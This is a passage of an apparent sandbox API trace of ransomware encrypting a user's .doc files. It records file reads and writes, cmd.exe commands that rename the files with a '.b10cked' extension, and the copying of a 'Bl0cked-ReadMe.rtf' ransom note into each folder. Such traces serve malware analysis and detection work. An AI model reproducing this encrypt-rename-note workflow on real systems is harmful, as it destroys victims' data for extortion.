lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12788 [0137.290] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x12c70 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x12c70 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.291] ReadFile (in: 
hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9637, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9637, lpOverlapped=0x0) returned 1 [0137.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.292] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9637, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9637, lpOverlapped=0x0) returned 1 [0137.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=-38455, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9639 [0137.292] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9637, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9637, lpOverlapped=0x0) returned 1 [0137.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=-38455, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9639 [0137.293] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9637, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9637, lpOverlapped=0x0) returned 1 [0137.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UzyEGr8akjufgS.doc", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0137.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UzyEGr8akjufgS.doc", cchWideChar=18, lpMultiByteStr=0x13288fc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UzyEGr8akjufgS.doc", lpUsedDefaultChar=0x0) returned 18 [0137.298] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x12c70 [0137.298] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.298] CloseHandle (hObject=0x114) returned 1 [0137.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\UzyEGr8akjufgS.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC") returned 0x48 [0137.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0137.301] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xcf0, dwThreadId=0xcec)) returned 1 [0137.303] CloseHandle (hObject=0x110) returned 1 [0137.303] CloseHandle (hObject=0x114) returned 1 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0137.303] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount2=45) returned 3 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.303] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.304] CharUpperBuffW (in: lpsz="type 
\"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.304] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.304] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0137.304] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.304] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.304] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd0c, dwThreadId=0xcf4)) returned 1 [0137.364] CloseHandle (hObject=0x110) returned 1 [0137.364] CloseHandle (hObject=0x114) returned 1 
[0137.364] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0137.364] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.364] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.364] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\WnPdVDXwSUv.doc" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\wnpdvdxwsuv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x51a3 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19415435001) returned 1 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x4cbb [0137.367] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x51a3 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.368] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x51a3 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.369] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x28d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x28d0, lpOverlapped=0x0) returned 1 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.369] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x28d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x28d0, lpOverlapped=0x0) returned 1 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=-10448, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28d3 [0137.369] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x28d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x28d0, lpOverlapped=0x0) returned 1 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=-10448, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: 
